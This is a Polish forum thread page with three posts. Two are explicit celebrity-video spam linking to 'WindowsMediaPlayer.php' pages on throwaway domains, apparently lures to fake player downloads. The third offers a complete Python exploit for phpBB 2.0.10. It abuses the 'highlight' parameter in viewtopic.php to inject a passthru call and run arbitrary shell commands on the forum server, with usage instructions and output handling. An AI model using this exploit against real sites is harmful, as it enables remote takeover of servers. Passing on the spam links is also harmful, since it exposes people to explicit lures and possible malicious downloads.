![]() |
Przegląd tematu | ![]() |
![]() |
|
Lindsay Lohan Doing A Hung Guy!
http://Lindsay-Lohan-Doing-A-Hung-Guy.info/WindowsMediaPlayer.php?movie=1115657 |
![]() |
|
Carmen Electra Giving A Head And Taking A Load!
http://Carmen-Electra-Giving-A-Head-And-Taking-A-Load.org/WindowsMediaPlayer.php?movie=1115657 |
![]() |
|
ten exploit wykorzystuje lukę w systemie phpBB v. 2.0.10
sposób użycia: python exploit.py <forum> <numer postu> <"komenda"> np. python exploit.py http://forum.pl 666 "uname -a" kod exploita: import urllib import sys host = sys.argv[1] numer = sys.argv[2] komenda = sys.argv[3] url = host url += "/viewtopic.php?t=" url += numer url += "&cmd=" url += urllib.quote("echo POCZATEK; %s; echo KONIEC"%komenda) url += "&highlight=%2527" url += urllib.quote(".passthru($_GET[cmd]).") url += "%2527" data = urllib.urlopen(url) drukuj = 0 for line in data.readlines(): if line.find("KONIEC")!= -1: drukuj = 0 print "~~~~~~~~~~ KONIEC ~~~~~~~~~~" break if line.find("POCZATEK")!= -1: drukuj = 1 print "~~~~~~~~~~ WYNIK ~~~~~~~~~~" continue if drukuj: line = line.replace("\n", "") print line ![]() |